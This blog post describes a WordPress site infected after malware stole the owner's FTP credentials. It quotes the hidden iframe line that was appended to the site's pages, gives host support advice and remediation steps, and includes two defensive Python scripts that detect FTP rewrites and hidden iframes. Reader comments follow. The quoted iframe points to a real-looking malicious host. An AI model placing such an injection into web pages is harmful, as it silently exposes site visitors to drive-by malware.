Completely Remove Malware from Your Computer – Malware / Worm that steals FTP login information
This week I got an error on almost all of my WordPress blogs; this error occurred twice in the past 5 days. It really made me worried and giddy, because there's just a blank page with an error message like this:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in ….
Parse error: syntax error, unexpected '.' in ….
After I checked my files, I found code added at the bottom of them, iframe code like this:
<iframe src="http://c9u.at:8080/ts/in.cgi?pepsi147" width=125 height=125 style="visibility: hidden"></iframe>
This line tells me that I have been hacked, infected by a virus / worm.
This is a malware / worm that steals my FTP login information from my FTP programs and modifies lots of php / html / htm pages on all of the sites it can access. In the FTP log file, there are lots of entries showing someone downloading a file and then re-uploading it. It appears to modify the files destructively, overwriting whatever text was there.
Here's a list of some sources that I found regarding this issue:
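The download-then-re-upload pattern described above can be searched for in the server's FTP transfer log. The following is an added example, not part of the original post; it assumes the log is in the common xferlog format, and the log lines, IP addresses, user name and the 60-second window are constructed for illustration.

```python
from datetime import datetime, timedelta

# Constructed sample in xferlog format (an assumption; check your server).
# The 12th field is the direction: "o" = download, "i" = upload.
SAMPLE_LOG = """\
Thu Jun  4 03:12:01 2009 1 203.0.113.7 5120 /public_html/index.php a _ o r siteuser ftp 0 * c
Thu Jun  4 03:12:03 2009 1 203.0.113.7 5263 /public_html/index.php a _ i r siteuser ftp 0 * c
Thu Jun  4 03:12:05 2009 1 203.0.113.7 812 /public_html/about.html a _ o r siteuser ftp 0 * c
Thu Jun  4 03:12:06 2009 1 203.0.113.7 955 /public_html/about.html a _ i r siteuser ftp 0 * c
Thu Jun  4 09:30:00 2009 2 198.51.100.20 40960 /public_html/photo.jpg b _ i r siteuser ftp 0 * c
"""
WEB_EXT = (".php", ".html", ".htm")

def parse_xferlog(line):
    """Return the fields we need from one xferlog line, or None if malformed."""
    f = line.split()
    if len(f) < 18:
        return None
    try:
        ts = datetime.strptime(" ".join(f[0:5]), "%a %b %d %H:%M:%S %Y")
        return {"time": ts, "host": f[6], "size": int(f[7]),
                "path": f[8], "dir": f[11], "user": f[13]}
    except ValueError:
        return None

def find_rewrites(log_text, window=timedelta(seconds=60)):
    """Flag web files uploaded shortly after the same host downloaded them.

    Returns (path, host, size_delta) tuples; a small positive delta is
    consistent with a few lines being appended to the file.
    """
    last_download = {}  # (host, path) -> most recent download entry
    findings = []
    for line in log_text.splitlines():
        e = parse_xferlog(line)
        if e is None or not e["path"].lower().endswith(WEB_EXT):
            continue
        key = (e["host"], e["path"])
        if e["dir"] == "o":
            last_download[key] = e
        elif e["dir"] == "i" and key in last_download:
            d = last_download.pop(key)
            if e["time"] - d["time"] <= window:
                findings.append((e["path"], e["host"], e["size"] - d["size"]))
    return findings

if __name__ == "__main__":
    for path, host, delta in find_rewrites(SAMPLE_LOG):
        print(f"{path} rewritten by {host}, size change {delta:+d} bytes")
```
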
http://wordpress.org/support/topic/268083
http://wordpress.org/support/topic/272140
http://wordpress.org/support/topic/272379
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
The first time I faced this virus, what I did was re-upload the infected files and change my FTP password. I thought I had resolved the problem and it would not happen again. But I was wrong; today I got this error again.
So now I really know that I need to take serious action to completely remove the worm / malware. I have to ensure my computer is completely clean and that it doesn't happen again.
According to Hostgator Security Support, in order to protect against future attacks, I need to run full virus and malware scans on my computer to ensure that it is clean.
Hello,
It appears that malicious code has been uploaded to your account via FTP using a compromised username and password. At this time, I have removed the malicious code from the account.
From our experience with malware of this nature, the user account passwords are compromised through viruses/malware located on your local computer. This malware sniffs out passwords used and stored by FTP programs located on the computer. In order to protect against future attack, you will need to run full virus and malware scans on your computers to ensure that they are clean. I recommend using multiple scanners as we have found that some scanners do not detect the malware. MalwareBytes ( http://www.malwarebytes.org/ ) and ComboFix ( http://www.bleepingcomputer.com/combofix/how-to-use-combofix ) have been reported to be able to clean this malware. It is highly suggested that you also do the following:
* Any computers legitimately allowed to access the account must be updated fully (Windows updates, browser updates, application updates, anti-virus updates)
* Any computers legitimately allowed to access the account must be completely scanned for viruses and secured completely
Although I'm still not sure that my computer is completely clean, I have taken some actions to protect it:
- Update my FTP password
- Update my FTP software to the newest version
- Of course, re-upload infected files and upgrade my WordPress blog to the latest version
- Scan my whole computer using Malware Bytes from www.malwarebytes.org
That's all I can do for now; I hope this error doesn't happen again and the worm is completely removed.
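Before re-uploading, it helps to know exactly which files carry the injected line. The following is an added example, not part of the original post: it walks a local copy of the site and reports hidden iframes in php / html / htm files, noting whether each sits on the file's last line as described above. The file names and the injected.example host are constructed placeholders.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.I)
WEB_EXT = (".php", ".html", ".htm")

def scan_file(path):
    """Return (line_no, src_host, is_last_line) for each hidden iframe."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = fh.read().splitlines()
    hits = []
    for n, line in enumerate(lines, 1):
        for tag in IFRAME.findall(line):
            if HIDDEN.search(tag):
                m = SRC.search(tag)
                host = urlparse(m.group(1)).hostname if m else None
                hits.append((n, host, n == len(lines)))
    return hits

def scan_tree(root):
    """Map each affected file (path relative to root) to its hits."""
    report = {}
    for folder, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXT):
                full = os.path.join(folder, name)
                hits = scan_file(full)
                if hits:
                    report[os.path.relpath(full, root)] = hits
    return report

def demo():
    """Build a constructed two-file site and scan it."""
    bad = ('<iframe src="http://injected.example:8080/in.cgi" width=125 '
           'height=125 style="visibility: hidden"></iframe>')
    ok = '<iframe src="http://video.example/embed" width=400></iframe>'
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php echo 'hi'; ?>\n" + bad)
        with open(os.path.join(root, "clean.html"), "w") as fh:
            fh.write("<html><body>" + ok + "</body></html>\n")
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```
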

That's why we need to always have updated anti-malware, anti-spyware.. and antivirus on our PC.
I just changed my login info too.. I think I've become paranoid..
Upgrade every now and then. Passwords should also be changed to prevent all these FTP hacks.
My PC has Deep Freeze and AVG installed, and I don't have problems with malware.
Based, demand service, it does not need to be installed on every computer.
Malware or malicious software is software designed to infiltrate or damage a computer system without the owner’s informed consent.
After losing a computer to damage caused by viruses and malware, I can’t stop worrying about the security of my other PCs. I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what antivirus to use.
How did you remove this malware? If I am using AVG9, is it possible to remove malware like this?
In the market there are an enormous number of antivirus treatment solutions.
Thanks for the code man… I think many blog owners are looking for this kind of code.
There are many anti-malware and anti-spyware products in the market but they do not remove it properly. I think this code will help a lot, thank you for sharing this post.
Thanks for the information. This information is very important.
I recently set up a brand new machine and I would really appreciate some advice on what firewall to install and what antivirus to use. But sometimes the operating system also enhances the matter of the fact as it is considered.
I purchased a domain name and a hosting plan from godaddy.com. I am using a WYSIWYG program called NVU to build my site. It asks for the Publishing Address, which is the FTP server info that I get from my web hosting service.
I once suffered this kind of hack. It allowed the hacker to post URLs right inside my post. I didn't notice it in time. When I eventually discovered it, it took a lot of work to get the posts re-written and the malicious URLs removed. I'm going to run a malware test on my computer right away.
It can be really nauseating getting hacked. It is better to take necessary steps to prevent a hack, especially as your website content gets voluminous. Else, the clean-up process can really be tasking.